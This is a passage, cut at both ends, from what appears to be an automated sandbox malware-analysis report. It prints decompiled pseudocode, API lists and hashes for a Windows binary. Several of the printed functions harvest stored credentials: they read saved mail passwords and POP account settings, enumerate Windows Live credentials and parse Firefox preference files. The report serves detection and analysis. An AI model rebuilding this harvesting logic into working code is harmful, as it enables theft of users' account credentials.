                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                        • String ID: Unknown Error$netmsg.dll
                                                                        • API String ID: 3198317522-572158859
                                                                        • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                        • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                        • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                        • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v188;
                                                                        				char _v268;
                                                                        				char _v524;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				char* _t53;
                                                                        				void* _t60;
                                                                        				void* _t65;
                                                                        				char* _t70;
                                                                        
                                                                        				_v8 = _v8 & 0x00000000;
                                                                        				_t65 = __eax;
                                                                        				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                                        				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                                        				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                                        				if(_v524 == 0x31) {
                                                                        					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                                        				}
                                                                        				_v12 = _t65 + 0x110;
                                                                        				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                                        				_t70 = _t65 + 0x214;
                                                                        				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
                                                                        				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                                        				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                                        				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                                        				if(_v268 != 0) {
                                                                        					_v188 = 0;
                                                                        					E00401D5A( &_v268, _t65 + 0x294);
                                                                        					if( *_t70 == 0) {
                                                                        						_push(_a8);
                                                                        						_t60 = 0x7f;
                                                                        						_push(_t60);
                                                                        						_push(_t70);
                                                                        						_push("PopAccount");
                                                                        						_push(_a4);
                                                                        						E0040311F();
                                                                        						if( *_t70 != 0) {
                                                                        							_t53 = strchr(_t70, 0x40);
                                                                        							_a8 = _t53;
                                                                        							if(_t53 != 0) {
                                                                        								E004060D0(_t60, _v12,  &(_t53[1]));
                                                                        								 *_a8 = 0;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_v8 = 1;
                                                                        				}
                                                                        				if( *_t70 != 0) {
                                                                        					_v8 = 1;
                                                                        				}
                                                                        				return _v8;
                                                                        			}















                                                                        APIs
                                                                          • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                        • strchr.MSVCRT ref: 00403262
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringstrchr
                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                        • API String ID: 1348940319-1729847305
                                                                        • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                        • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                        • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                        • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 16%
                                                                        			E0040F09D(char* __eax, void* __ecx) {
                                                                        				void* _t2;
                                                                        				char* _t3;
                                                                        				void* _t5;
                                                                        				void* _t6;
                                                                        				void* _t7;
                                                                        
                                                                        				_t3 = __eax;
                                                                        				_t6 = __ecx;
                                                                        				_t5 = 4;
                                                                        				while(1) {
                                                                        					_t2 =  *_t3;
                                                                        					if(_t2 != 0x3c) {
                                                                        						goto L3;
                                                                        					}
                                                                        					_push(_t5);
                                                                        					_push("&lt;");
                                                                        					L14:
                                                                        					_t2 = memcpy(_t6, ??, ??);
                                                                        					_t7 = _t7 + 0xc;
                                                                        					_t6 = _t6 + _t5;
                                                                        					L16:
                                                                        					if( *_t3 != 0) {
                                                                        						_t3 = _t3 + 1;
                                                                        						continue;
                                                                        					}
                                                                        					return _t2;
                                                                        					L3:
                                                                        					if(_t2 != 0x3e) {
                                                                        						if(_t2 != 0x22) {
                                                                        							if(_t2 != 0xb0) {
                                                                        								if(_t2 != 0x26) {
                                                                        									if(_t2 != 0xa) {
                                                                        										 *_t6 = _t2;
                                                                        										_t6 = _t6 + 1;
                                                                        									} else {
                                                                        										_push(_t5);
                                                                        										_push("<br>");
                                                                        										goto L14;
                                                                        									}
                                                                        								} else {
                                                                        									_push(5);
                                                                        									_push("&amp;");
                                                                        									goto L11;
                                                                        								}
                                                                        							} else {
                                                                        								_push(5);
                                                                        								_push("&deg;");
                                                                        								L11:
                                                                        								_t2 = memcpy(_t6, ??, ??);
                                                                        								_t7 = _t7 + 0xc;
                                                                        								_t6 = _t6 + 5;
                                                                        							}
                                                                        						} else {
                                                                        							_t2 = memcpy(_t6, "&quot;", 6);
                                                                        							_t7 = _t7 + 0xc;
                                                                        							_t6 = _t6 + 6;
                                                                        						}
                                                                        					} else {
                                                                        						_push(_t5);
                                                                        						_push("&gt;");
                                                                        						goto L14;
                                                                        					}
                                                                        					goto L16;
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                        • API String ID: 3510742995-3273207271
                                                                        • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                        • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                        • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                        • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E0040D865(intOrPtr* _a4) {
                                                                        				char _v260;
                                                                        				char _v516;
                                                                        				void _v771;
                                                                        				char _v772;
                                                                        				intOrPtr _v776;
                                                                        				intOrPtr _v780;
                                                                        				intOrPtr _v788;
                                                                        				int _v796;
                                                                        				char _v800;
                                                                        				signed int _v804;
                                                                        				char _v808;
                                                                        				char _v812;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t52;
                                                                        				void* _t53;
                                                                        				void* _t57;
                                                                        				signed int _t58;
                                                                        				char* _t65;
                                                                        				unsigned int _t68;
                                                                        				intOrPtr _t69;
                                                                        				void* _t85;
                                                                        				char* _t89;
                                                                        				intOrPtr _t92;
                                                                        				intOrPtr* _t93;
                                                                        				signed int _t94;
                                                                        				void* _t96;
                                                                        
                                                                        				_t52 = _a4;
                                                                        				_t96 = (_t94 & 0xfffffff8) - 0x32c;
                                                                        				_push(_t85);
                                                                        				 *((intOrPtr*)(_t52 + 4)) = 0;
                                                                        				 *((intOrPtr*)(_t52 + 8)) = 0;
                                                                        				_t89 = 0;
                                                                        				_t53 = E00406278();
                                                                        				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
                                                                        				if( *((intOrPtr*)(_t53 + 4)) > 5) {
                                                                        					_t89 = L"WindowsLive:name=*";
                                                                        				}
                                                                        				_v800 = 0;
                                                                        				_v796 = 0;
                                                                        				if(E00404647( &_v800, _t85, _t97) == 0) {
                                                                        					L21:
                                                                        					return E004046C2( &_v800);
                                                                        				}
                                                                        				_v808 = 0;
                                                                        				_v812 = 0;
                                                                        				if(_v780 == 0) {
                                                                        					_t57 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
                                                                        				}
                                                                        				if(_t57 == 0) {
                                                                        					goto L21;
                                                                        				} else {
                                                                        					_t58 = 0;
                                                                        					_v804 = 0;
                                                                        					if(_v812 <= 0) {
                                                                        						L20:
                                                                        						_v788(_v808);
                                                                        						goto L21;
                                                                        					} else {
                                                                        						do {
                                                                        							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
                                                                        							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
                                                                        								_v772 = 0;
                                                                        								memset( &_v771, 0, 0xff);
                                                                        								_t96 = _t96 + 0xc;
                                                                        								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
                                                                        									_push(0x11);
                                                                        									_t65 =  &_v772;
                                                                        									_push("windowslive:name=");
                                                                        									_push(_t65);
                                                                        									L00411612();
                                                                        									_t96 = _t96 + 0xc;
                                                                        									if(_t65 == 0) {
                                                                        										_v516 = 0;
                                                                        										_v260 = 0;
                                                                        										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
                                                                        										_t68 =  *(_t92 + 0x18);
                                                                        										if(_t68 > 0) {
                                                                        											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
                                                                        											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
                                                                        										}
                                                                        										if(_v260 == 0) {
                                                                        											_t69 = _a4;
                                                                        											_t44 = _t69 + 8;
                                                                        											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                                                        											__eflags =  *_t44;
                                                                        										} else {
                                                                        											_t93 = _a4;
                                                                        											 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                                                        											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t58 = _v804 + 1;
                                                                        							_v804 = _t58;
                                                                        						} while (_t58 < _v812);
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        			}































                                                                        APIs
                                                                          • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                        • memset.MSVCRT ref: 0040D917
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                        • _strnicmp.MSVCRT ref: 0040D948
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                        • API String ID: 945165440-3589380929
                                                                        • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                        • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                        • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                        • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                                        				RECT* _v8;
                                                                        				void* __esi;
                                                                        				void* _t39;
                                                                        				signed int _t41;
                                                                        				void* _t42;
                                                                        				struct HWND__* _t47;
                                                                        				signed int _t53;
                                                                        				void* _t54;
                                                                        				signed int _t76;
                                                                        				signed int _t78;
                                                                        				void* _t80;
                                                                        				void** _t82;
                                                                        				signed int _t86;
                                                                        				void* _t90;
                                                                        				signed int _t91;
                                                                        
                                                                        				_t80 = __edi;
                                                                        				_push(_t58);
                                                                        				_push(0xc);
                                                                        				_v8 = 0;
                                                                        				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                        				L004115D0();
                                                                        				if(__eax == 0) {
                                                                        					_t82 = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(__eax)) = 0;
                                                                        					_t82 = __eax;
                                                                        				}
                                                                        				 *(_t80 + 0xc) = _t82;
                                                                        				_t39 =  *_t82;
                                                                        				_t90 = _t39;
                                                                        				if(_t90 != 0) {
                                                                        					_push(_t39);
                                                                        					L004115D6();
                                                                        					 *_t82 = 0;
                                                                        				}
                                                                        				_t82[2] = _a8;
                                                                        				_t41 = E004049FB(_a8);
                                                                        				_t76 = 4;
                                                                        				_t82[1] = _t41;
                                                                        				_t42 = _t41 * _t76;
                                                                        				_push( ~(0 | _t90 > 0x00000000) | _t42);
                                                                        				L004115D0();
                                                                        				 *_t82 = _t42;
                                                                        				memset(_t42, 0, _t82[1] << 2);
                                                                        				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                        				_t91 =  *(_t80 + 0x10);
                                                                        				if(_t91 == 0) {
                                                                        					_t86 = ( *(_t80 + 0xc))[1];
                                                                        					_t78 = 0x14;
                                                                        					_t53 = _t86 * _t78;
                                                                        					_push( ~(0 | _t91 > 0x00000000) | _t53);
                                                                        					L004115D0();
                                                                        					 *(_t80 + 0x10) = _t53;
                                                                        					if(_t86 > 0) {
                                                                        						_t54 = 0;
                                                                        						do {
                                                                        							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
                                                                        							_t54 = _t54 + 0x14;
                                                                        							_t86 = _t86 - 1;
                                                                        						} while (_t86 != 0);
                                                                        					}
                                                                        					_v8 = 1;
                                                                        				}
                                                                        				if(E00401540(0x448, _t80, _a4) == 1) {
                                                                        					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                        					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
                                                                        				}
                                                                        				_t47 = SetFocus(_a8);
                                                                        				if(_v8 != 0) {
                                                                        					_push( *(_t80 + 0x10));
                                                                        					L004115D6();
                                                                        				}
                                                                        				return _t47;
                                                                        			}



















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                        • String ID:
                                                                        • API String ID: 2313361498-0
                                                                        • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                        • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                        • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                        • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040A698(void* __esi) {
                                                                        				struct HDWP__* _v8;
                                                                        				int _v12;
                                                                        				intOrPtr _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagRECT _v48;
                                                                        				void* _t32;
                                                                        				int _t60;
                                                                        				int _t65;
                                                                        
                                                                        				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
                                                                        					GetClientRect( *(__esi + 0x108),  &_v32);
                                                                        					GetWindowRect( *(__esi + 0x114),  &_v48);
                                                                        					_t65 = _v48.bottom - _v48.top + 1;
                                                                        					GetWindowRect( *(__esi + 0x118),  &_v48);
                                                                        					_v12 = _v32.right - _v32.left;
                                                                        					_t60 = _v48.bottom - _v48.top + 1;
                                                                        					_v16 = _v32.bottom - _v32.top;
                                                                        					_v8 = BeginDeferWindowPos(3);
                                                                        					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                                                        					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                                                        					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                                                        					return EndDeferWindowPos(_v8);
                                                                        				}
                                                                        				return _t32;
                                                                        			}












                                                                        APIs
                                                                        • GetClientRect.USER32 ref: 0040A6B7
                                                                        • GetWindowRect.USER32 ref: 0040A6CD
                                                                        • GetWindowRect.USER32 ref: 0040A6E0
                                                                        • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                        • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$Defer$Rect$BeginClient
                                                                        • String ID:
                                                                        • API String ID: 2126104762-0
                                                                        • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                        • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                        • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                        • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00406069(void* _a4) {
                                                                        				signed int _t11;
                                                                        				int _t13;
                                                                        				void* _t17;
                                                                        				signed int _t19;
                                                                        				void* _t22;
                                                                        
                                                                        				_t22 = _a4;
                                                                        				_t19 = 0;
                                                                        				EmptyClipboard();
                                                                        				if(_t22 != 0) {
                                                                        					_t2 = strlen(_t22) + 1; // 0x1
                                                                        					_t13 = _t2;
                                                                        					_t17 = GlobalAlloc(0x2000, _t13);
                                                                        					if(_t17 != 0) {
                                                                        						memcpy(GlobalLock(_t17), _t22, _t13);
                                                                        						GlobalUnlock(_t17);
                                                                        						_t11 = SetClipboardData(1, _t17);
                                                                        						asm("sbb esi, esi");
                                                                        						_t19 =  ~( ~_t11);
                                                                        					}
                                                                        				}
                                                                        				CloseClipboard();
                                                                        				return _t19;
                                                                        			}









                                                                        APIs
                                                                        • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                        • strlen.MSVCRT ref: 0040607E
                                                                        • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                        • GlobalLock.KERNEL32 ref: 0040609A
                                                                        • memcpy.MSVCRT ref: 004060A3
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004060B5
                                                                        • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 3116012682-0
                                                                        • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                        • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                        • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                        • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040C530(void* __eflags, intOrPtr* _a4) {
                                                                        				int _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				void _v1029;
                                                                        				void _v1039;
                                                                        				char _v1040;
                                                                        				void _v2063;
                                                                        				void _v2064;
                                                                        				void _v3087;
                                                                        				void _v3088;
                                                                        				void* __ebx;
                                                                        				intOrPtr _t53;
                                                                        				void* _t54;
                                                                        				void* _t56;
                                                                        				void* _t59;
                                                                        				void* _t60;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        				void* _t73;
                                                                        				void* _t85;
                                                                        				int _t86;
                                                                        				void* _t106;
                                                                        				int _t107;
                                                                        				int _t111;
                                                                        				void* _t114;
                                                                        				void* _t115;
                                                                        				void* _t116;
                                                                        
                                                                        				_v1040 = 0;
                                                                        				memset( &_v1039, 0, 0x3ff);
                                                                        				_v3088 = 0;
                                                                        				memset( &_v3087, 0, 0x3ff);
                                                                        				_v2064 = 0;
                                                                        				memset( &_v2063, 0, 0x3ff);
                                                                        				_t116 = _t115 + 0x24;
                                                                        				_t53 = E00406B74(_a4 + 4);
                                                                        				_v12 = 0;
                                                                        				_v16 = _t53;
                                                                        				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
                                                                        				if(_t54 != 0) {
                                                                        					do {
                                                                        						_t56 = E004069D2(0, "user_pref(\"");
                                                                        						_pop(_t92);
                                                                        						if(_t56 != 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						_push(0x412b10);
                                                                        						_t60 = 0xb;
                                                                        						_t14 = E004069D2(_t60) - 0xb; // -11
                                                                        						_t92 = _t14;
                                                                        						_v8 = _t92;
                                                                        						if(_t92 <= 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						_t85 = E004069D2(_t61 + 1, 0x412b18);
                                                                        						_t17 = _t85 + 1; // 0x1
                                                                        						_t106 = E004069D2(_t17, 0x412b10);
                                                                        						if(_t106 <= 0) {
                                                                        							_t28 = _t85 + 1; // 0x1
                                                                        							_t67 = E004069D2(_t28, ")");
                                                                        							_pop(_t92);
                                                                        							_t68 = 0xfffffffe;
                                                                        							_t111 = _t67 + _t68 - _t85;
                                                                        							if(_t111 <= 0) {
                                                                        								goto L10;
                                                                        							}
                                                                        							_t107 = _v8;
                                                                        							memcpy( &_v3088,  &_v1029, _t107);
                                                                        							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                                        							_t73 = _t114 + _t85 - 0x40a;
                                                                        							L9:
                                                                        							memcpy( &_v2064, _t73, _t111);
                                                                        							_t92 = _a4;
                                                                        							_t116 = _t116 + 0x18;
                                                                        							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                                        							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                                        							if(_t59 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							goto L10;
                                                                        						}
                                                                        						_t20 = _t106 + 1; // 0x1
                                                                        						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
                                                                        						_pop(_t92);
                                                                        						if(_t111 <= 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						_t86 = _v8;
                                                                        						memcpy( &_v3088,  &_v1029, _t86);
                                                                        						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                                        						_t73 = _t114 + _t106 - 0x40b;
                                                                        						goto L9;
                                                                        						L10:
                                                                        						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
                                                                        					} while (_t59 != 0);
                                                                        					return _t59;
                                                                        				}
                                                                        				return _t54;
                                                                        			}


                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpymemset$strlen$_memicmp
                                                                        • String ID: user_pref("
                                                                        • API String ID: 765841271-2487180061
                                                                        • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                        • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                        • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                        • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E0040559F(intOrPtr _a4) {
                                                                        				struct HWND__* _v12;
                                                                        				signed int _v16;
                                                                        				int _v20;
                                                                        				int _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				int _v48;
                                                                        				char* _v52;
                                                                        				void* _v64;
                                                                        				void _v319;
                                                                        				char _v320;
                                                                        				struct HWND__* _t53;
                                                                        				intOrPtr* _t59;
                                                                        				void* _t61;
                                                                        				intOrPtr _t66;
                                                                        				void* _t74;
                                                                        				void* _t80;
                                                                        				intOrPtr _t81;
                                                                        				void* _t84;
                                                                        				intOrPtr _t89;
                                                                        				short _t91;
                                                                        				signed int _t94;
                                                                        				short* _t95;
                                                                        				void* _t96;
                                                                        				void* _t97;
                                                                        
                                                                        				_t89 = _a4;
                                                                        				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
                                                                        				_v12 = _t53;
                                                                        				SendMessageA(_t53, 0x1009, 0, 0);
                                                                        				SendMessageA(_v12, 0x1036, 0, 0x26);
                                                                        				do {
                                                                        				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
                                                                        				_push(0xc8);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_v12);
                                                                        				_t80 = 6;
                                                                        				E00404925(0x412466, _t80);
                                                                        				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                                        				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                                        				_t97 = _t96 + 0x10;
                                                                        				_v32 = _t81;
                                                                        				_v28 =  *_t59;
                                                                        				_v20 = 0;
                                                                        				if(_t81 <= 0) {
                                                                        					L10:
                                                                        					_t61 = 2;
                                                                        					E004048B6(_t61, _v12, 0, _t61);
                                                                        					return SetFocus(_v12);
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        				do {
                                                                        					L3:
                                                                        					_v16 = 0;
                                                                        					_v24 = 0;
                                                                        					do {
                                                                        						_t94 = _v16 << 2;
                                                                        						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                                        							_v320 = 0;
                                                                        							memset( &_v319, 0, 0xff);
                                                                        							_t97 = _t97 + 0xc;
                                                                        							_v52 =  &_v320;
                                                                        							_v64 = 4;
                                                                        							_v48 = 0xff;
                                                                        							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
                                                                        								_push(_v16);
                                                                        								_push(0);
                                                                        								_push(_v12);
                                                                        								_t84 = 5;
                                                                        								_t74 = E0040496E( &_v320, _t84);
                                                                        								_t95 = _t94 + _v28;
                                                                        								_t91 =  *_t95;
                                                                        								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
                                                                        								_t97 = _t97 + 0x18;
                                                                        								if(_t91 == 0) {
                                                                        									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_v16 = _v16 + 1;
                                                                        						_t66 = _v32;
                                                                        						_v24 = _v24 + 0x14;
                                                                        					} while (_v16 < _t66);
